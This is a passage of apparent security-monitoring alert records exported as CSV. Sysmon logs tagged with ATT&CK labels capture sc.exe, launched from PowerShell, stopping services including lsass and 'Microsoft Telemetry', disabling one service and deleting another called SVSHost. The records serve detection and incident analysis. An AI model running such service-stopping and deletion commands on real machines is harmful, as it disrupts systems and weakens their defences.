Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.822",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.817 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001059291900} +ProcessId: 5508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.819678100Z"",""eventRecordID"":""2036"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.817\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001059291900}\r\nProcessId: 5508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.817"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001059291900}"",""processId"":""5508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.774",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.785 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010fd261900} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.787421900Z"",""eventRecordID"":""2033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.785\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010fd261900}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.785"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010fd261900}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.759",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.774 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001035261900} +ProcessId: 4208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.777639400Z"",""eventRecordID"":""2032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.774\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001035261900}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.774"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001035261900}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.730",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.751 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010a3241900} +ProcessId: 6036 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.753746100Z"",""eventRecordID"":""2030"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.751\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010a3241900}\r\nProcessId: 6036\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.751"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010a3241900}"",""processId"":""6036"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.706 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f4211900} +ProcessId: 6864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.708346900Z"",""eventRecordID"":""2027"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.706\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f4211900}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.706"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010f4211900}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.634",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.679 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-00102c201900} +ProcessId: 2528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.682063000Z"",""eventRecordID"":""2024"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.679\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-00102c201900}\r\nProcessId: 2528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.679"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-00102c201900}"",""processId"":""2528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.664 +ProcessGuid: 